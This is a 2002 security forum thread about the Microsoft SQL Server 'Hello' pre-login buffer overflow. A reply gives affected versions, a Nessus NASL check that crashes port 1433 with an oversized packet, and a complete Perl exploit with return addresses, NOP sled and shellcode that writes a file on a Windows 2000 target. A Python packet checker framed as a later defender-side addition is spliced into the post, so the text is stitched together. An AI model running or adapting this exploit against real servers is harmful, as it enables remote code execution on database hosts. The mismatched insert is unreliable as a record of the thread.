MS SQL Hello Overflow

Networking/Security Forums -> Exploits // System Weaknesses

Author: RichieRich    Posted: Tue Dec 10, 2002 7:16 am    Post subject: MS SQL Hello Overflow
    ----
Does anyone know how to exploit the MS SQL Hello buffer overflow? Any information would be greatly appreciated.

Author: ShaolinTiger    Location: Kuala Lumpur, Malaysia    Posted: Tue Dec 10, 2002 12:10 pm    Post subject:
    ----
Versions Affected:

Microsoft SQL Server 7.0
Microsoft Data Engine (MSDE) 1.0
Microsoft SQL Server 2000
Microsoft Desktop Engine (MSDE) 2000

Scope:

The first vulnerability concerns the possibility of overwriting memory by sending a specially crafted login request to the SQL Server (the so-called “Hello Bug”). This could result in the execution of arbitrary code. Entercept protects against code execution as a result of buffer overflows.

The second vulnerability is a buffer overflow condition in one of the Database Console Commands (DBCC) and exploitation could lead to arbitrary code execution. Entercept’s Database Edition protects against exploitation of several buffer overflow conditions in the DBCCs by blocking access to these commands. In addition, Entercept Standard Edition’s buffer overflow protection prevents code execution as a result of buffer overflows.

The third vulnerability is found in the SQL Agent, which can receive and execute jobs submitted by a database user. The privileges that come with running jobs by the SQL Agent may be higher than those of the database user that submitted them. Entercept’s Database Edition blocks access to the job scheduling stored procedures and thus prevents this elevation of privileges.

Nessus also has this one in its database.

Code:
##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
# TODO:
# technically we should also go to the UDP 1434 resolver service
# and get any additional ports!!!


if(description)
{
 script_id(11067);
# script_cve_id("CVE-2000-0402");
 script_version ("$Revision: 0.1 $");
 name["english"] = "Microsoft SQL Server Hello Overflow";
 script_name(english:name["english"]);
 
 desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

 script_description(english:desc["english"]);
 
 summary["english"] = "Microsoft SQL Server Hello Overflow";
 script_summary(english:summary["english"]);
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
 family["english"] = "Windows";
 script_family(english:family["english"]);
 script_require_ports(1433);
 exit(0);
}

#
# The script code starts here
#
#taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00  ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03  ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

#taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

# technically we should also go to the UDP 1434 resolver service
# and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";


if(get_port_state(port))
{
    soc = open_sock_tcp(port);

    if(soc)
    {
        # uncomment this to see what normally happens
        # attack_string = "MSSQLServer";
        # uncomment next line to actually test for overflow
        attack_string = crap(560);
        # this creates a variable called sql_packet
        sql_packet = pkt_hdr + attack_string + pkt_tail;
        send(socket:soc, data:sql_packet);

        r = recv(socket:soc, length:4096);
        close(soc);
        # display("Result:", r, "\n");
        if(!r)
        {
            # display("Security Hole in MSSQL\n");
            security_hole(port:port, data:report);
        }
    }
}


And below is a simple exploit that writes a file to the target machine:

Code:
#!/usr/local/bin/perl

#-----------------------------------------------------------
#   Exploit will create file '\scan_sql2k_bo2.'
#
# SQL Server 2000 'Hello Bug' for Win2k(SP2)
#    by sk@scan-associates.net & spoonfork
#
# Bug found by
#   Dave Aitel
#   http://online.securityfocus.com/archive/1/286311/2002-08-02/2002-08-08/0
#
# http://www.scan-associates.net/
# greetz to:    scan clan, especially to tynon, pokleyzz, and wyse
#      Alphaque and L33tdawg.
#      and Dave Aitel for finding and not releasing the exploit :>
# original and most up-to-date of dis file can be found in
#   http://www.scan-associates.net/papers/sql2kx2.txt
#-----------------------------------------------------------
use Socket;


$connect_host = $ARGV[0];

if (!defined($connect_host)) {
   print "Usage: $0 <target>\n";
   exit 255;
}

$port = 1433;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

$bug =  "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b";
$bug .=  "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02";
$bug .=  "\x10\x00\x00\x00";
$bug2 =  "A" x 528;
$bug .=  $bug2;
$bug .=  "\x6b\xd0\xc0\x40";
$bug .=  "AAAA";
$bug .=  "\x83\x91\xe8\x77";
$bug .=  "\x50\x1e\xd0\x42";
$bug .=  "\x0b\x03\x0f\x02";
$bug .=  "DDDD";
$bug .=  "\x50\x1e\xd0\x42";
$bug .=  "\x50\x1e\xd0\x42";
$bug3 =  "\x90" x 88;
$bug .=  $bug3;
$bug .=  "\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73";
$bug .=  "\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x32\x2E\x88";
$bug .=  "\x46\x10\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2";
$bug .=  "\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0";

$bug .=  "\x00\x24\x01\x00\x00";

print SOCKET $bug;

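As an added defender-side example (not code from either post, Nessus or scan-associates), the header bytes in the NASL script above decode, per the MS-TDS PRELOGIN layout, into an option table whose 0x02 (INSTOPT) entry is a 12-byte instance-name field, which is exactly the slot that crap(560) fills; the tail's leading 0x00 is the name's terminator. The Python below rebuilds the benign and the oversized packet and flags the latter the way an IDS rule or proxy check would; the INSTOPT naming, the 255-byte cap and the "NUL-terminated copy" reading of the bug are assumptions taken from the TDS spec, not from the page.

```python
import struct

# Header + option table (36 bytes) and tail (5 bytes) copied from the NASL script above.
PKT_HDR = bytes([
    0x12, 0x01, 0x00, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x06, 0x01, 0x00, 0x1b,
    0x00, 0x01, 0x02, 0x00, 0x1c, 0x00, 0x0c, 0x03, 0x00, 0x28, 0x00, 0x04, 0xff, 0x08, 0x00, 0x02,
    0x10, 0x00, 0x00, 0x00,
])
PKT_TAIL = bytes([0x00, 0x24, 0x01, 0x00, 0x00])   # NUL terminator + 4-byte THREADID

TDS_PRELOGIN = 0x12   # TDS packet type for PRELOGIN (MS-TDS)
INSTOPT = 0x02        # option token carrying the instance name (MS-TDS naming, assumption)


def build_packet(instance_field: bytes) -> bytes:
    """Assemble the packet the same way the NASL script does: header + field + tail."""
    return PKT_HDR + instance_field + PKT_TAIL


def check_prelogin(pkt: bytes) -> list:
    """Return findings for a TDS PRELOGIN packet; an empty list means it looks well-formed."""
    findings = []
    if len(pkt) < 8 or pkt[0] != TDS_PRELOGIN:
        return ["not a TDS PRELOGIN packet"]
    declared = struct.unpack(">H", pkt[2:4])[0]          # big-endian total packet length
    if declared != len(pkt):
        findings.append(f"declared length {declared} != actual length {len(pkt)}")
    payload = pkt[8:]                                    # option offsets are payload-relative
    pos = 0
    while pos < len(payload) and payload[pos] != 0xFF:   # 0xFF ends the option table
        if pos + 5 > len(payload):
            findings.append("truncated option table")
            return findings
        token = payload[pos]
        off, length = struct.unpack(">HH", payload[pos + 1:pos + 5])
        if off >= len(payload):
            findings.append(f"option 0x{token:02x} offset {off} lies outside the packet")
        elif 8 + off + length > declared:
            findings.append(f"option 0x{token:02x} data ends past the declared packet end")
        elif token == INSTOPT:
            # A parser that copies the name up to its NUL ignores the declared length;
            # measure how far such a copy would actually run.
            nul = payload.find(b"\x00", off)
            run = (nul if nul != -1 else len(payload)) - off
            if run >= length:
                findings.append(f"instance name runs {run} bytes, past its declared {length}-byte field")
        pos += 5
    return findings
```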
Author: chet    Location: Nottingham, UK    Posted: Sat Jan 25, 2003 1:43 pm    Post subject:
    ----
They are going mad over in the states

Yep, going mad in the states, huge DDoS attack

http://webhostingtalk.com/showthread.php?s=c8b022fd63798fcc6524175a8d4933e2&threadid=107128

And wow this is getting busy,


